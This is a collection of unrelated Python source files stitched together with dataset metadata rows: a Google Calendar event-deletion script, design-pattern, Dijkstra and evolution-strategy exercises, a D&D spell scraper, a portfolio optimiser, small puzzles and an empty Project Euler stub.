# The file token.json stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
store = file.Storage('/home/soso/token.json')
creds = store.get()
if not creds or creds.invalid:
flow = client.flow_from_clientsecrets('/home/soso/credentials.json', SCOPES)
creds = tools.run_flow(flow, store)
service = build('calendar', 'v3', http=creds.authorize(Http()))
# Call the Calendar API
#now = datetime.datetime.utcnow().isoformat() + 'Z' # 'Z' indicates UTC time
# NOTE(review): `now` and `tomorrow` are computed but never passed to the
# list() call below — presumably leftovers from a time-bounded query.
now = datetime.datetime.utcnow().replace(hour=0, minute=0, second=0, microsecond=0).isoformat() + 'Z'
tomorrow = datetime.datetime.utcnow().replace(hour=0,minute=0,second=0,microsecond=0) + datetime.timedelta(days=1)
tomorrow = tomorrow.isoformat() + 'Z'
events_result = service.events().list(calendarId='s8hos5mvbudjmnj34b726nm8lc@group.calendar.google.com',
maxResults=100, singleEvents=True,
orderBy='startTime',q="소소클래스",showDeleted=True).execute()
events = events_result.get('items', [])
print(datetime.datetime.now())
if not events:
print('No upcoming events found.')
exit(0)
for event in events:
#print(event)
if event['status'] == 'cancelled':
# `id` shadows the builtin; kept as-is to avoid behavior changes.
id = event['id']
try:
title = event['summary']
except KeyError:
continue
print("삭제된 일정 : {}".format(title))
# Try the 12 derived event ids ("<id>0".."<id>11") on the target calendar.
for i in range(0,12):
try:
service.events().delete(calendarId='qb2gfb6okeeob5s2qoh3hbiuj0@group.calendar.google.com',
eventId='{0}{1}'.format(id,i)).execute()
print('삭제중 {}'.format(event['summary']))
except:
# Bare except: missing ids are expected; all other API errors are
# silently swallowed here as well (best-effort deletion).
pass
if __name__ == '__main__':
main()
| true |
1054134384ea34b8e2dbae9f05bd0cfbffb0cfb2 | Python | QQYES/Design_Patterns | /Adapter_Pattern.py | UTF-8 | 1,051 | 3.90625 | 4 | [] | no_license | class Duck:
# Abstract Duck interface: concrete ducks override both no-op methods.
def quack(self):
pass
def fly(self):
pass
class MallardDuck(Duck):
    """Concrete Duck used by the adapter demo."""

    def quack(self):
        print("Quack")

    def fly(self):
        print("I'm flying")
class Turkey:
    """Adaptee interface: turkeys gobble instead of quacking and only fly
    short hops.  Both defaults are no-ops for subclasses to override."""

    def gobble(self):
        """No-op default."""

    def fly(self):
        """No-op default."""
class WildTurkey(Turkey):
    """Concrete Turkey used by the adapter demo."""

    def gobble(self):
        print("Gobble gobble")

    def fly(self):
        print("I'm flying a short distance")
class TurkeyAdapter(Duck):
    """GoF object adapter: presents a Turkey through the Duck interface."""

    def __init__(self, turkey: Turkey):
        self.turkey = turkey

    def quack(self):
        # A gobble stands in for a quack.
        self.turkey.gobble()

    def fly(self):
        # Five short turkey hops approximate one duck flight.
        for _ in range(5):
            self.turkey.fly()
# Exercise the Duck interface on any duck-like object (quack, then fly).
def duckTest(duck: Duck):
duck.quack()
duck.fly()
# Demo: a plain turkey, a plain duck, and a turkey adapted to the Duck API.
if __name__ == '__main__':
duck: MallardDuck = MallardDuck()
turkey: WildTurkey = WildTurkey()
turkeyAdapter = TurkeyAdapter(turkey)
print("The Turkey says...")
turkey.gobble()
turkey.fly()
print("\nThe Duck says...")
duckTest(duck)
print("\nThe TurkeyAdapter says...")
duckTest(turkeyAdapter)
2db7eb3d3f0f569f85591473fd5cf09e29d1a8d4 | Python | KaiboLiu/CS519-010-ALG | /hw9/dijkstra.py | UTF-8 | 7,144 | 3.015625 | 3 | [] | no_license | '''
Developer: Kaibo(lrushx)
Email: liukaib@oregonstate.edu
Process Time: Mar 1, 2018
'''
from collections import defaultdict
import time
'''
class keyPQ(): # decrease-key priority queue
def __init__(self, h=[]):
self.heap = h # list of [weight, V] in heap
self.len = len(h)
self.popped = set()
self.idx = defaultdict(lambda:-1)
for i,(_,v,_) in enumerate(h): self.idx[v] = i
self.heapify()
def heapify(self):
i0 = self.len >> 1
for i in range(i0,-1,-1):
self.sink(i)
def push(self, item):
self.heap.append(item)
self.idx[item[1]] = self.len
self.rise(self.len)
self.len += 1
def pop(self):
if self.len == 0: return None
self.len -= 1
self.switch(0,self.len)
top = self.heap.pop()
self.popped.add(top[1])
self.sink(0)
return top
def sink(self, i):
l, r = i+i+1, i+i+2
if l >= self.len: return
if r >= self.len and self.heap[i][0] > self.heap[l][0]:
self.switch(i, l)
self.sink(l)
if r < self.len:
minChild = l if self.heap[l][0] < self.heap[r][0] else r
if self.heap[i][0] > self.heap[minChild][0]:
self.switch(i, minChild)
self.sink(minChild)
def rise(self, i):
if i == 0: return
parent = (i-1)>>1
if self.heap[i][0] < self.heap[parent][0]:
self.switch(i, parent)
self.rise(parent)
def switch(self, i, j):
self.heap[i], self.heap[j] = self.heap[j], self.heap[i]
self.idx[self.heap[i][1]], self.idx[self.heap[j][1]] = i, j
def decreaseKey(self, i, w, prev):
self.heap[i][0], self.heap[i][2] = w, prev
self.rise(i)
## O((V+E)logV), decrease-key heap
## 0.769 s on flip test
def shortest1(n, edges):
def solution(v, back):
if v == start: return [v]
return solution(back[v],back)+[v]
edge = defaultdict(set)
back = {}
for (u,v,w) in edges:
#weight[u,v] = weight[v,u] = min(weight[u,v],w)
edge[u].add((v,w))
edge[v].add((u,w))
start, end = 0, n-1
# init 1: put all the start's neighbors to the heap, and heapify, O(n1)
global npop, npush
npop, npush = 0, 1
h = [[0, start, -1]] #[dist, node, prev]
for v,w in edge[start]:
h.append([w, v, start])
npush += 1
q = keyPQ(h)
while q.len:
w0, u, prev = q.pop()
npop += 1
back[u] = prev
if u == end: return w0, solution(end,back)
for v,w in edge[u]:
w1 = w0 + w
if v in q.idx: # v in the queue and not popped yet
if v in q.popped: continue
if w1 < q.heap[q.idx[v]][0]:
q.decreaseKey(q.idx[v],w1,u)
npush += 1
else: # the rest nodes linked to u, which are not in the queue, q.idx[v] == -1
q.push([w1, v, u])
npush += 1
return None
## O((V+E)logV), decrease-key heap-dict from https://gist.github.com/matteodellamico/4451520
## a little faster than shortest1
def shortest2(n, edges):
import priority_dict
def solution(v, back):
if v == start: return [v]
return solution(back[v],back)+[v]
edge = defaultdict(set)
for (u,v,w) in edges:
edge[u].add((v,w))
edge[v].add((u,w))
start, end = 0, n-1
# init : put start to the heap, O(1), but push its neighbors later one by one, O(n1logn1)
dic = priority_dict.priority_dict() # dic[u]:(dist,u,last), means the dist from start to u, and last of u is last
dic[start] = (0,-1)
back = {}
global npop, npush
npop,npush = 0,0
while dic:
u, (w0, prev) = dic.pop_smallest()
npop += 1
back[u] = prev
if u == end: return w0, solution(end,back)
for v, w in edge[u]:
if v in back: continue # v not popped yet
w1 = w+w0
if v in dic and w1 >= dic[v][0]: continue
dic[v] = (w1,u)#dic.__setitem__(v,w1) # v in the queue, or v not visitted
npush += 1
return None
'''
## O((E+E)logE), heap
## 0.316 s on flip test
def shortest(n, edges):
    """Dijkstra with a plain push-only heap (lazy deletion).

    Nodes are 0 .. n-1; `edges` is an iterable of undirected (u, v, w)
    triples.  Returns (distance, path) from node 0 to node n-1, or None if
    the target is unreachable.  Updates the module-level npop/npush counters.
    """
    import heapq
    adjacency = defaultdict(set)
    for u, v, w in edges:
        adjacency[u].add((v, w))
        adjacency[v].add((u, w))
    source, target = 0, n - 1
    parent = {}                              # node -> predecessor (finalized)
    best = defaultdict(lambda: 1 << 30)      # best distance pushed so far
    global npop, npush
    npop, npush = 0, 0
    heap = [(0, source, -1)]                 # (distance, node, predecessor)
    while heap:
        dist, node, prev = heapq.heappop(heap)
        npop += 1
        if node in parent:
            continue                         # stale entry (lazy deletion)
        parent[node] = prev
        if node == target:
            # Walk predecessors back to the source, then reverse.
            path = [node]
            while path[-1] != source:
                path.append(parent[path[-1]])
            path.reverse()
            return dist, path
        for neighbor, weight in adjacency[node]:
            if neighbor not in parent and dist + weight < best[neighbor]:
                heapq.heappush(heap, (dist + weight, neighbor, node))
                best[neighbor] = dist + weight
                npush += 1
    return None
# Global pop/push counters reported by the benchmark below.
npop,npush = 0, 0
if __name__ == "__main__":
# NOTE(review): shortest1 and shortest2 are defined inside the
# triple-quoted string above (commented out), so running this script
# raises NameError at the shortest1/shortest2 calls below.
print(shortest(4, [(0,1,1), (0,2,5), (1,2,1), (2,3,2), (1,3,6)]))
# (4, [0,1,2,3])
print(shortest(5,[(0,2,24),(0,4,20),(3,0,3),(4,3,12)]))
#(15, [0, 3, 4])
import sys
import pdb
#sys.path.append("/nfs/farm/classes/eecs/winter2018/cs519-010/include")
SEED, MinDist, MaxDist = 1, 1, 100
# Random undirected edge list: `length` edges over k nodes with weights
# in [MinDist, MaxDist].
def generate_seq(k,length,seed): import random; random.seed(seed); return [tuple(sorted(random.sample(range(k),2))+[random.randint(MinDist,MaxDist)]) for _ in range(length)] # (5,10)
#tuple1 = generate_seq(10,50,1)
#dense_tuples = generate_seq(1000, 50000, 1)
dense_tuples = generate_seq(1000, 1000000, SEED)
VEset = ((1000,5000),(1000,10000),(1000,50000),(1000,500000),(1000,1000000))
print("see: {}, Weight_Range: {}~{}\n".format(SEED,MinDist,MaxDist))
# Time the three implementations on increasingly dense prefixes.
for V, E in VEset:
print("V={}, E={}".format(V, E))
t1 = time.time()
res = shortest1(V, dense_tuples[:E])
print("decrease-key_DIY:{0}, time {1:.3f}, pop:{2}, push:{3}".format(res,time.time()-t1,npop,npush))
t1 = time.time()
res = shortest(V, dense_tuples[:E])
print("heappush-only: {0}, time {1:.3f}, pop:{2}, push:{3}".format(res,time.time()-t1,npop,npush))
t1 = time.time()
res = shortest2(V, dense_tuples[:E])
print("heapdict_new: {0}, time {1:.3f}, pop:{2}, push:{3}\n".format(res,time.time()-t1,npop,npush))
#pdb.set_trace()
'''
tuples_1 = generate_seq(5000, 50000, 1)
tuples_2 = generate_seq(5000, 50000, 4)
V,E = 5000, 50000
t1 = time.time()
print(shortest(V, tuples_1))
print("V={}, E={}, total time {}".format(V, E,time.time()-t1))
V,E = 5000, 50000
t1 = time.time()
print(shortest(V, tuples_2))
print("V={}, E={}, total time {}".format(V, E,time.time()-t1))
'''
| true |
78fcae8c3007923f8ad2c86600b677df325e4f36 | Python | bud386/algo-CS | /백준_구현/1783_병든나이트.py | UTF-8 | 307 | 3.171875 | 3 | [] | no_license | import sys
# BOJ 1783 "sick knight": maximum number of squares the knight can visit on
# an n x m board; visiting 5+ squares requires using every move type.
n, m = map(int, sys.stdin.readline().split())
ans = 1
if n > 2:
    if m < 5:
        ans = m
    elif m == 5 or m == 6:
        ans = 4  # capped at 4 until the board is wide enough for all moves
    else:
        ans = m - 2
elif n == 2:
    # Height 2 allows only the (±1, ±2) moves: one new column per 2 steps,
    # capped at 4 visits.
    if m < 7:
        ans = (m + 1) // 2
    else:
        ans = 4
print(ans)
| true |
5e66690b2bea28bade592c3e2ba78a1c107c4066 | Python | mahdissfr/Dimension_Reduction_by_PCA | /src/ES.py | UTF-8 | 4,911 | 3.046875 | 3 | [] | no_license | import random
import numpy
from Chromosome import Chromosome
########## b andaze Mu
from file_handler import read_from_file
from plot import plot
def generate_initial_population(chromosome_length, min_ab, max_ab, x, y):
    """Create the initial ES population.

    Returns a list of `chromosome_length` freshly constructed Chromosome
    instances (construction arguments are passed straight through).

    The original also accumulated each chromosome's `.gene` into a local
    list that was never used; that dead code is removed.
    """
    return [Chromosome(chromosome_length, min_ab, max_ab, x, y)
            for _ in range(chromosome_length)]
def generate_new_seed(Mu):
    """Sample lambda = 7 * len(Mu) parents uniformly, with replacement.

    :return: the lambda selected parents (empty when Mu is empty)
    """
    size = len(Mu)
    return [Mu[random.randint(0, size - 1)] for _ in range(7 * size)]
def crossover(chromosome1, chromosome2, alpha):
    """Arithmetic (blend) crossover of the first two genes, in place.

    Each gene pair (g1, g2) is replaced by ``alpha*g1 + (1-alpha)*g2`` and
    ``alpha*g2 + (1-alpha)*g1`` respectively, then both chromosomes are
    re-evaluated.

    Bug fixes versus the original:
    * the parent genes are snapshot first -- ``gene1`` used to alias
      ``chromosome1.gene``, so the second child was computed from the
      *already mutated* values instead of the originals;
    * ``chromosome2.evaluate()`` is now called (``chromosome1`` used to be
      evaluated twice, leaving chromosome2's fitness stale);
    * both distinct chromosomes are returned (it used to return
      ``chromosome1`` twice).
    """
    gene1 = list(chromosome1.gene[:2])
    gene2 = list(chromosome2.gene[:2])
    for idx in range(2):
        chromosome1.gene[idx] = alpha * gene1[idx] + (1 - alpha) * gene2[idx]
        chromosome2.gene[idx] = alpha * gene2[idx] + (1 - alpha) * gene1[idx]
    chromosome1.evaluate()
    chromosome2.evaluate()
    return chromosome1, chromosome2
# def get_sigma(x_sigma, ps, c):
# if ps == 0.2:
# return x_sigma
# elif ps < 0.2:
# return c * x_sigma
# else:
# return x_sigma / c
def get_sigma(sigma_max, sigma_min, t, N):
    """Linearly anneal the mutation step from ``sigma_max`` (t=0) to ``sigma_min`` (t=N)."""
    delta = sigma_min - sigma_max
    return sigma_max + delta * t / N
def mutation(chromosome, sigma):
    """Perturb both genes of ``chromosome`` in place and return it.

    A single N(0, 1) sample is drawn and the same ``sigma``-scaled offset is
    added to both genes, so the two components always move together.
    (Sharing one draw may be intentional -- a correlated step -- independent
    per-gene noise would need two samples; confirm with the author.)
    """
    step = sigma * numpy.random.normal(loc=0.0, scale=1.0, size=None)
    chromosome.gene[0] += step
    chromosome.gene[1] += step
    return chromosome
def evaluate_new_generation(generation):
    """Recompute the fitness of every chromosome in ``generation`` in place."""
    for individual in generation:
        individual.evaluate()
def Q_tournament(parents):
    """Q-tournament selection (q=4): sample candidates, return the fittest.

    Returns:
        tuple: ``(best, index)`` where ``index`` is the position of ``best``
        in ``parents``.

    Bug fix: the original returned the index of the *last sampled* candidate
    rather than the winner's index, so the caller popped the wrong
    chromosome from the pool.

    Note: the sampling range shrinks by one on each draw, mirroring the pop
    the caller performs afterwards even though this function does not pop;
    that quirk is preserved as-is.  # TODO confirm intent
    """
    q = 4
    best_index = random.randint(0, len(parents) - 1)
    best = parents[best_index]
    for i in range(q - 1):
        index = random.randint(0, len(parents) - 1 - i)
        challenger = parents[index]
        if challenger.fitness > best.fitness:
            best = challenger
            best_index = index
    return best, best_index


def choose_new_generation(Mu, lambdaParent):
    """Select the next generation of ``len(Mu)`` chromosomes.

    Runs repeated Q-tournaments over the combined pool
    ``lambdaParent + Mu``, removing each winner from the pool so it cannot
    be selected twice.

    Bug fix: the pool is now a *copy*, so the caller's ``lambdaParent`` list
    is no longer extended/popped in place as a side effect.
    """
    pool = lambdaParent + Mu
    new_generation = []
    for _ in range(len(Mu)):
        best, index = Q_tournament(pool)
        new_generation.append(best)
        pool.pop(index)
    return new_generation
if __name__ == '__main__':
    # Evolution Strategy driver: (mu, lambda)-style loop with mutation,
    # arithmetic crossover and Q-tournament survivor selection.
    MuSize = 10
    crossover_probability = 0.4
    # N = 100
    N = 100  # number of generations
    min_ab = 0
    max_ab = 1
    x, y = read_from_file()
    chromosome_length = len(x)
    # chromosome_length = 10
    # ps = 1
    # c = 0.8
    alpha = 0.5   # blend factor for arithmetic crossover
    Smin = 1      # final (smallest) mutation step size
    k = 0.125     # Smax is k times the initial fitness spread
    Mu = generate_initial_population(chromosome_length, min_ab, max_ab, x, y)
    max_node = max(Mu, key=lambda node: node.fitness)
    min_node = min(Mu, key=lambda node: node.fitness)
    avg_fitness = sum(c.fitness for c in Mu) / len(Mu)
    print("t=0 best fitness: " + str(max_node.fitness) + " worst: " + str(
        min_node.fitness) + " average fitness: " + str(avg_fitness))
    Smax = k * (max_node.fitness - min_node.fitness)
    print("smax: "+str(Smax))
    for t in range(N):
        lambdaParent = generate_new_seed(Mu)
        # Mutate every selected parent with a linearly annealed sigma.
        for i in range(len(lambdaParent)):
            # lambdaParent[i].sigma = get_sigma(lambdaParent[i].sigma, ps, c)
            lambdaParent[i].sigma = get_sigma(Smax, Smin, t, N)
            mutation(lambdaParent[i], lambdaParent[i].sigma)
        crossovered = []
        # Each crossover consumes two parents, hence the division by 2.
        toCrossOver = int(crossover_probability * len(lambdaParent) / 2)
        for j in range(toCrossOver):
            index1 = random.randint(0, len(lambdaParent) - 1)
            chromosome1 = lambdaParent.pop(index1)
            index2 = random.randint(0, len(lambdaParent) - 1)
            chromosome2 = lambdaParent.pop(index2)
            crossovered.extend(crossover(chromosome1, chromosome2, alpha))
        lambdaParent.extend(crossovered)
        evaluate_new_generation(lambdaParent)
        Mu = choose_new_generation(Mu, lambdaParent)
        max_node = max(Mu, key=lambda node: node.fitness)
        min_node = min(Mu, key=lambda node: node.fitness)
        avg_fitness = sum(c.fitness for c in Mu) / len(Mu)
        print("t=" + str(t+1) + " ) best fitness: " + str(max_node.fitness) + " worst: " + str(
            min_node.fitness) + " average fitness: " + str(avg_fitness))
    print(str(max_node.get_normal_ab()))
    plot(max_node)
| true |
30877994f9aa3f3bcc569f6c2ad6c3e09066b0e1 | Python | vakor50/Dashboard | /Spells/scrape.py | UTF-8 | 4,165 | 2.65625 | 3 | [] | no_license | import csv
import requests
from BeautifulSoup import BeautifulSoup
import json
import re
import HTMLParser
h = HTMLParser.HTMLParser()
# https://www.dndbeyond.com/spells/abi-dalzims-horrid-wilting/more-info
# https://www.dndbeyond.com/spells/absorb-elements/more-info
class Spell(object):
    """Plain attribute container for one scraped D&D Beyond spell record.

    Attributes are assigned dynamically by the scraping loop below (name,
    school, components, level, casting_time, duration, range, save, and
    optionally ritual/concentration/desc/material).
    """
    pass
list_of_spells = []
# Walk the paginated spell listing (pages 1..22 at the time of writing),
# scrape the summary row for each spell, then fetch its "more-info" page
# for the full description.  Python 2 / BeautifulSoup 3 code.
for x in range(1,23):
    print x
    url = 'https://www.dndbeyond.com/spells?page=' + str(x)
    response = requests.get(url)
    html = response.content
    soup = BeautifulSoup(html)
    table = soup.find('ul', attrs={'class': 'listing listing-rpgspell rpgspell-listing'})
    for row in table.findAll('div', attrs={'class': 'info'}):
        spellObj = Spell()
        link_section = '';
        link = row.find('a', attrs={'class': 'link'})
        link_section = link['href']
        # print "\nlink: " + link_section
        name = row.find('div', attrs={'class': 'row spell-name'})
        component = name.findAll('span')
        # print "name: " + component[0].text
        # The replace/re.sub pair strips mojibake and non-ASCII characters.
        n = h.unescape(component[0].text.replace("€", "'"))
        n = re.sub(r'[^\x00-\x7f]',r'', n)
        # n = n.replace('’', '\'').replace(' ', ' ')
        spellObj.name = n
        # print "school: " + component[2].text
        # assumes fixed span order in the row markup -- TODO confirm
        spellObj.school = component[2].text
        # print "component: " + component[4].text
        spellObj.components = component[4].text
        level = row.find('div', attrs={'class': 'row spell-level'})
        # print "level: " + level.span.text
        spellObj.level = level.span.text
        cast_time = row.find('div', attrs={'class': 'row spell-cast-time'})
        # print "cast time: " + cast_time.text
        spellObj.casting_time = cast_time.text
        duration = row.find('div', attrs={'class': 'row spell-duration'})
        # print "duration: " + duration.text
        spellObj.duration = duration.span.text
        # NOTE(review): this local shadows the builtin `range`.
        range = row.find('div', attrs={'class': 'row spell-range'})
        # print "range: " + range.text
        spellObj.range = range.text
        save = row.find('div', attrs={'class': 'row spell-attack-save'})
        # print "save: " + save.text
        spellObj.save = save.text
        for ritual in row.findAll('i', attrs={'class': 'i-ritual'}):
            spellObj.ritual = "yes"
        for concentration in row.findAll('i', attrs={'class': 'i-concentration'}):
            spellObj.concentration = "yes"
        # -----------------------------------------------------------------
        # Second request: the spell's detail page with the full description.
        spell_url = 'https://www.dndbeyond.com' + link_section + '/more-info'
        # print "url: " + spell_url
        spell_response = requests.get(spell_url)
        spell_html = spell_response.content
        spell_soup = BeautifulSoup(spell_html)
        # print spell_soup.find('div', attrs={'class': 'more-info-body-description'})
        for spell_page in spell_soup.findAll('div', attrs={'class': 'more-info-body-description'}):
            # print "desc: "
            description = []
            for d in spell_page.findAll('p'):
                desc = h.unescape(d.text.replace("€", "\'"))
                desc = re.sub(r'[^\x00-\x7f]',r'', desc)
                # desc = desc.replace('’', '\'').replace(' ', ' ')
                description.append('<p>' + desc + '</p>')
            spellObj.desc = ''.join(description)
            # for description in spell_page.findAll('p'):
            #     print description
            #     spellObj.desc += description
            for materials in spell_page.findAll('span', attrs={'class': 'components-blurb'}):
                m = h.unescape(materials.text.replace("€", "'"))
                m = re.sub(r'[^\x00-\x7f]',r'', m)
                # m = m.replace('’', '\'').replace(' ', ' ').replace('€', '').replace('™', '')
                spellObj.material = m
        list_of_spells.append(spellObj)
print "\n\n\n"
# for s in list_of_spells:
#     if hasattr(s, 'desc'):
#         print s.desc
#         print "\n\n\n"
# Serialise every spell's attribute dict to a single JSON file.
output = []
for s in list_of_spells:
    output.append(s.__dict__)
    # print(s.__dict__)
with open("dndbeyond_spells.json", 'wb') as outfile:
    json.dump(output, outfile)
# json.dumps(result)
# list_of_cells = []
# for cell in row.findAll('td'):
#     text = cell.text.replace(' ', '')
#     list_of_cells.append(text)
#     list_of_rows.append(list_of_cells)
# outfile = open("./inmates.csv", "wb")
# writer = csv.writer(outfile)
# writer.writerow(["Last", "First", "Middle", "Gender", "Race", "Age", "City", "State"])
# writer.writerows(list_of_rows)
b267fd041fa7455343e30bab48eb35bf9d1565be | Python | hyperac1d/Web-Python-Exercises | /countme.py | UTF-8 | 2,749 | 3.296875 | 3 | [] | no_license | print("Enter as many words as you can in the word BREAKER")
breaker = ['ark', 'eke', 'err', 'era', 'bee', 'rare', 'reek', 'bake',
'bark', 'bare', 'beer', 'beak', 'bear', 'baker', 'brake',
'break', 'barker', 'beaker', 'bearer', 'breaker', 'are',
'ear', 'ere', 'bar', 'bra', 'rake', 'rear']
count = 0
#for x in breaker:
# word = str(input("Word: "))
# if(word.lower() in breaker):
# count = count +1
word1 = str(input("Word: "))
if (word1.lower() in breaker):
count = count+1
word2 = str(input("Word: "))
if (word2.lower() in breaker):
count = count+1
word3 = str(input("Word: "))
if (word3.lower() in breaker):
count = count+1
word4 = str(input("Word: "))
if (word4.lower() in breaker):
count = count+1
word5 = str(input("Word: "))
if (word5.lower() in breaker):
count = count+1
word6= str(input("Word: "))
if (word6.lower() in breaker):
count = count+1
word7 = str(input("Word: "))
if (word7.lower() in breaker):
count = count+1
word8 = str(input("Word: "))
if (word8.lower() in breaker):
count = count+1
word9 = str(input("Word: "))
if (word9.lower() in breaker):
count = count+1
word10 = str(input("Word: "))
if (word10.lower() in breaker):
count = count+1
word11= str(input("Word: "))
if (word11.lower() in breaker):
count = count+1
word12 = str(input("Word: "))
if (word12.lower() in breaker):
count = count+1
word13 = str(input("Word: "))
if (word13.lower() in breaker):
count = count+1
word14 = str(input("Word: "))
if (word14.lower() in breaker):
count = count+1
word15 = str(input("Word: "))
if (word15.lower() in breaker):
count = count+1
word16 = str(input("Word: "))
if (word16.lower() in breaker):
count = count+1
word17 = str(input("Word: "))
if (word17.lower() in breaker):
count = count+1
word18 = str(input("Word: "))
if (word18.lower() in breaker):
count = count+1
word19 = str(input("Word: "))
if (word19.lower() in breaker):
count = count+1
word20 = str(input("Word: "))
if (word20.lower() in breaker):
count = count+1
word21 = str(input("Word: "))
if (word21.lower() in breaker):
count = count+1
word22 = str(input("Word: "))
if (word22.lower() in breaker):
count = count+1
word23 = str(input("Word: "))
if (word23.lower() in breaker):
count = count+1
word24 = str(input("Word: "))
if (word24.lower() in breaker):
count = count+1
word25 = str(input("Word: "))
if (word25.lower() in breaker):
count = count+1
word26 = str(input("Word: "))
if (word26.lower() in breaker):
count = count+1
word27 = str(input("Word: "))
if (word27.lower() in breaker):
count = count+1
print('You got', count,' number of words in the word BREAKER')
| true |
13d9f7fde9723979dd53966aac7b30b1fd7f712a | Python | connerza/compInvestingHW | /HW1/hw1.py | UTF-8 | 2,824 | 2.90625 | 3 | [] | no_license | # QSTK Imports
import QSTK.qstkutil.qsdateutil as du
import QSTK.qstkutil.tsutil as tsu
import QSTK.qstkutil.DataAccess as da
# Third Party Imports
import datetime as dt
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
def simulate(startDate, endDate, symbols, allocations):
    """Simulate a fixed-allocation portfolio over NYSE trading days.

    Args:
        startDate, endDate: datetime bounds of the simulation window.
        symbols: list of ticker symbols.
        allocations: fraction of the portfolio held in each symbol
            (same order as ``symbols``).

    Returns:
        tuple: (stdDevRet, avRet, sharpeRatio, cumRet) of the daily returns.
    """
    #Read in adjusted closing prices for the 4 equities.
    dt_timeofday = dt.timedelta(hours = 16)  # 4pm = NYSE close
    ldt_timestamps = du.getNYSEdays(startDate, endDate, dt_timeofday)
    c_dataobject = da.DataAccess('Yahoo', cachestalltime=0)
    keys = ['close']
    ldf_data = c_dataobject.get_data(ldt_timestamps, symbols, keys)
    data = dict(zip(keys, ldf_data))
    # Filling the data for NAN
    for s_key in keys:
        data[s_key] = data[s_key].fillna(method='ffill')
        data[s_key] = data[s_key].fillna(method='bfill')
        data[s_key] = data[s_key].fillna(1.0)
    na_price = data['close'].values
    #Normalize the prices according to the first day.
    #The first row for each stock should have a value of 1.0 at this point.
    na_price = na_price / na_price[0]
    #Multiply each column by the allocation to the corresponding equity.
    for i, equity in enumerate(symbols):
        na_price[:, i] = na_price[:, i] * allocations[i]
    #Sum each row for each day. That is your cumulative daily portfolio value.
    # Day 0's "return" is relative to a starting value of 1.0.
    daily_rets = [sum(l)/sum(na_price[i-1]) - 1 for i,l in enumerate(na_price) if i != 0]
    daily_rets.insert(0, sum(na_price[0]) - 1)
    #Compute statistics from the total portfolio value.
    stdDevRet = np.std(daily_rets)
    avRet = sum(daily_rets) / len(daily_rets)
    sharpeRatio = np.sqrt(250) * avRet / stdDevRet  # annualised, 250 trading days
    # NOTE(review): cumRet is the *sum* of daily returns, not the compounded
    # product -- confirm this matches the assignment's definition.
    cumRet = sum(daily_rets)
    return stdDevRet, avRet, sharpeRatio, cumRet
if __name__ == '__main__':
    # Grid-search portfolio allocations in 10% steps and keep the mix with
    # the best Sharpe ratio.  Python 2 script (xrange, print statement).
    optimal = {}
    optimal['sharpe'] = 0
    optimal['allocations'] = []
    startDate = dt.datetime(2010,1,1)
    endDate = dt.datetime(2010,12,31)
    symbols = ['BRCM', 'ADBE', 'AMD', 'ADI']
    # The three loop bounds guarantee x+y+z <= 9, so the fourth allocation
    # (10-x-y-z)*.1 is always at least 0.1 and the four always sum to 1.0.
    # NOTE(review): xrange(0,10) stops at 9, so 100%-in-one-symbol mixes for
    # the first three symbols are never tried -- confirm that is intended.
    for x in xrange(0,10):
        for y in xrange(0, 10-x):
            for z in xrange(0, 10-x-y):
                allocations = [x*.1, y*.1, z*.1, (10-x-y-z)*.1]
                stdDevRet, avRet, sharpeRatio, cumRet = simulate(startDate, endDate, symbols, allocations)
                if sharpeRatio > optimal['sharpe']:
                    optimal['sharpe'] = sharpeRatio
                    optimal['allocations'] = [x*.1, y*.1, z*.1, (10-x-y-z)*.1]
                    optimal['volatility'] = stdDevRet
                    optimal['average'] = avRet
                    optimal['cumulative'] = cumRet
    print str.format("Start Date: {}", startDate.strftime("%B %d, %Y"))
    print str.format("End Date: {}", endDate.strftime("%B %d, %Y"))
    print str.format("Symbols: {}", symbols)
    print str.format("Optimal Allocations: {}", optimal['allocations'])
    print str.format("Sharpe Ratio: {}", optimal['sharpe'])
    print str.format("Volatility: {}", optimal['volatility'])
    print str.format("Average Daily Return: {}", optimal['average'])
    print str.format("Cumulative Return: {}", optimal['cumulative'])
| true |
5c36bed10d58472bc7702bc8d8849209b887b72b | Python | max180643/PSIT-IT | /Week-16/NumDays.py | UTF-8 | 866 | 3.53125 | 4 | [] | no_license | """
NumDays
Author : Chanwit Settavongsin
"""
def main(frist_day, frist_month, second_day, second_month):
    """Print the number of days between two dates of a non-leap year.

    The two dates may be given in either order.  Prints "Impossible" when a
    day number exceeds the length of its month.
    """
    days_in_month = {
        1: 31, 2: 28, 3: 31, 4: 30,
        5: 31, 6: 30, 7: 31, 8: 31,
        9: 30, 10: 31, 11: 30, 12: 31,
    }
    # Reject day numbers that do not exist in their month.
    if (frist_day > days_in_month[frist_month]
            or second_day > days_in_month[second_month]):
        print("Impossible")
        return
    if frist_month == second_month:
        print(abs(frist_day - second_day))
        return
    # Order the two dates chronologically, then count the days remaining in
    # the earlier month, the full months in between, and the later day.
    (m1, d1), (m2, d2) = sorted(
        [(frist_month, frist_day), (second_month, second_day)])
    between = sum(days_in_month[m] for m in range(m1 + 1, m2))
    print(days_in_month[m1] - d1 + d2 + between)
main(int(input()), int(input()), int(input()), int(input()))
| true |
c1d70f709925b90b55fcbd81e891613b56101e4a | Python | Ved005/project-euler-solutions | /code/stone_game_ii/sol_325.py | UTF-8 | 1,484 | 4 | 4 | [
"Apache-2.0"
] | permissive |
# -*- coding: utf-8 -*-
'''
File name: code\stone_game_ii\sol_325.py
Author: Vaidic Joshi
Date created: Oct 20, 2018
Python Version: 3.x
'''
# Solution to Project Euler Problem #325 :: Stone Game II
#
# For more information see:
# https://projecteuler.net/problem=325
# Problem Statement
'''
A game is played with two piles of stones and two players. At her turn, a player removes a number of stones from the larger pile. The number of stones she removes must be a positive multiple of the number of stones in the smaller pile.
E.g., let the ordered pair(6,14) describe a configuration with 6 stones in the smaller pile and 14 stones in the larger pile, then the first player can remove 6 or 12 stones from the larger pile.
The player taking all the stones from a pile wins the game.
A winning configuration is one where the first player can force a win. For example, (1,5), (2,6) and (3,12) are winning configurations because the first player can immediately remove all stones in the second pile.
A losing configuration is one where the second player can force a win, no matter what the first player does. For example, (2,3) and (3,4) are losing configurations: any legal move leaves a winning configuration for the second player.
Define S(N) as the sum of (xi+yi) for all losing configurations (xi,yi), 0 < xi < yi ≤ N. We can verify that S(10) = 211 and S(104) = 230312207313.
Find S(1016) mod 710.
'''
# Solution
# Solution Approach
'''
'''
| true |
